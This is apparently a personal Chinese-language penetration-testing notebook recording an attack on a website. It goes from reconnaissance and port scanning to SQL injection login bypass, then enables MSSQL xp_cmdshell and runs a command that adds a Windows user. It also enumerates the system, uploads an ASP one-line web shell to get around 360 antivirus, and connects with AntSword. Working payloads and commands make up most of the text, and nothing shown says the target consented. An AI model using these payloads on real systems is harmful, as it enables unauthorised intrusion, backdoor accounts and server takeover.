测试网址
1. 信息收集
- 网站信息 http://www.beianbeian.com/
- ip测试: http://www.17ce.com/site/http/
- c段扫描: http://webscan.cc/
- 子域名爆破 :…
- 工具:
nslookup
layer
代理来源:问题 原因 解决 IP封杀 子域名爆破速度过快,引起waf或防火墙过滤 一个人扫就好,不要同时好多人扫暴力破解,使用代理 - 手机开热点
- 网上的(貌似不好用)
- 个人服务器开了一个
- 梯子
***目的:得到真实ip, 以及旁站(+真实IP) ***
2.与1同时进行的
- IP端口服务扫描
1. nmap
2. scanport
猜测服务,主机系统
寻找可注入点
找到IP后:
3. 测试
burpsuit
- 网页代码分析
- 抓包分析
- 直接sql注入,最简单的 1’ or 1=1 --+
- 测试OK,成功登录
- 更换帐号测试 1’ or 1=1 order by 2; --+
问题 | 原因 | 解决 |
---|---|---|
开始测试时,sql注入没用,服务器返回错误页面 | 后来发现使用一样的语句可以注入,猜测:(1)IP被封杀中(2)后台服务可能还未启动,毕竟管理员有可能九点才上班 | * |
使用非本地代理,网页无法访问 | 不晓得,猜测:waf只允许本地IP登录 | 手机热点很好用 |
3.1
- 测试没得结果时, 进行网站目录爆破
工具使用:dirp
4.注入后
-
使用
burpsuit
没发现服务器将重要数据直接返回
*** 在修改密码页面时,有的url有 oldpasswd ,md5 解密, 有时登录后抓包会有惊喜 ***
*** 可能关键验证在本地执行,此时即可获取*** -
没几条有用的信息
-
尝试sql注入继续利用
mmsql 注入运行cmd命令
mmysql
开启存储过程
exec sp_configure 'show advanced option', 1;
reconfigure;
exec sp_configure 'xp_cmdshell' , 1;
reconfigure;
运行cmd指令
exec master..xp_cmdshell "net user wyl 123 /add";
https://www.xuebuyuan.com/1851454.html
exec master.xp_cmdshell "Command"
;
注意:
Command
中不能多于一个的引号,所以要使用引号要这么写:
DECLARE @cmd sysname, @var sysname
SET @var = ‘Hello world’
SET @cmd = ‘echo ’ + @var + ’ > F:/xiaozhu.txt’
EXEC master…xp_cmdshell @cmd
https://www.cnblogs.com/yuerdongni/archive/2012/08/22/2650676.html
权限:command
运行的权限与当前数据库运行的一致
当前状态: 可以运行服务器cmd命令
使用⌘cmd⌘得到服务器shell
cmd执行:
echo * > 1.txt #
dir > 1.txt
net user#查看当前系统有哪些用户
netstat -aon #网络状态
whoami
tasklist
systeminfo #系统各种信息
bitsadmin #win7及以上自带的,类似wget,不能下载https (不确定)
cmd 上传一句话木马
asp :
<%execute(request("kxc"))%>
问题 | 原因 | 解决 |
---|---|---|
上传后会被自动删除 | tasklist 有一个 ZhuDongFangYu 进程,怀疑360杀掉了 | 换马,就是上面的马 |
菜刀连不上,使用中国蚁剑连上
当前状态:连接上服务器,但权限很低,但sql注入权限是管理员
一句话木马原理:
https://blog.csdn.net/u011650048/article/details/43268807
http://www.myhack58.com/Article/html/3/8/2013/40323_7.htm